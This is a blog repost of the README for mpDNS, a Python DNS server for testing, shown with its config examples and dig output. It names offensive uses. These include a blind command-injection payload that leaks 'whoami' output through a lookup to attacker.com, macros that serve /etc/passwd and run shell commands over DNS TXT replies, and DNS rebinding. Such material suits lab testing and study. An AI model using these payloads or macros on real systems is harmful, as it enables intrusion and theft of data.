mpDNS : Multi-Purpose DNS Server 2019

mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.

  • Should work on Python 2 and 3
  • names.db -> holds all custom records (see examples)
  • Simple wildcards like *.example.com
  • Catch unicode dns requests
  • Custom actions aka macro:
    • {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
    • {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
    • {{file::/etc/passwd}} -> Respond with localfile contents
    • {{resolve}} -> Forward DNS request to local system DNS
    • {{resolve::example.com}} -> Resolve example.com instead of original record
    • {{echo}} -> Response back with peer address
    • {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
  • Supported query types: A, CNAME, TXT
  • Update names.db records without restart/reload with ./mpdns.py -e

Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

Usage: ./mpdns.py

  • Edit names.db with ./mpdns.py -e no restart required

Offensive and Defensive purposes

  • You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
  • Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
  • Easily infiltrate 65K of data in one TXT query
  • DNS Rebinding
  • Execute custom macro action on specific query (useful in malware-analysis lab environments)
  • And lots more. It is highly customizable.

Installing

git clone https://github.com/nopernik/mpDNS

Limitations

  • Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
    this limitation applies to TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
    therefore TXT record with macro {{file:localfile.txt}} is limited to 65200 bytes.
  • No support for nested wildcards test.*.example.com
  • No support for custom DNS server resolver in {{resolve::example.com}} macro
  • TTL always set to 0

Also Read – Http Request Smuggler : Extension For Burp Suite

Examples

names.db example:

>>Empty configuration will result in empty but valid responses
>>Unicode domain names are not supported but still can be catched by the server.
>> For example мама-сервер-unicode.google.com will be catched but with SERVFAIL response

passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}

Example output with names.db example:

Regular resolution from DB: dig test.example.com @localhost

;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8

mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost

;; QUESTION SECTION:
;c1.example.com. IN A

;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14

mpDNS output:

>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost

;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1

mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost

;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7

mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)

Forward request macro: dig google.com @localhost

;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110

mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)

Forward request of custom domain macro: dig notgoogle.com @localhost

;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110

mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)

File contents macro via TXT query: dig txt passwd.example.com @localhost

;; ANSWER SECTION:
passwd.example.com. 0 IN TXT “root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:……stripped”

mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> ‘root:x:0:0:root…(2808)’

Custom python code macro via TXT query: dig txt eval @localhost

;; ANSWER SECTION:
eval. 0 IN TXT “320”

mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> ‘320’

Shell command macro via TXT query: dig txt shellexec @localhost

;; ANSWER SECTION:
shellexec. 0 IN TXT “root”

mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> ‘root’

R K

Recent Posts

How to Install Docker on Ubuntu (Step-by-Step Guide)

Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…

14 hours ago

Uninstall Docker on Ubuntu

Docker is one of the most widely used containerization platforms. But there may come a…

14 hours ago

Admin Panel Dorks : A Complete List of Google Dorks

Introduction Google Dorking is a technique where advanced search operators are used to uncover information…

2 days ago

Log Analysis Fundamentals

Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…

3 days ago

Networking Devices 101: Understanding Routers, Switches, Hubs, and More

What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…

3 days ago

Sock Puppets in OSINT: How to Build and Use Research Accounts

Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…

3 days ago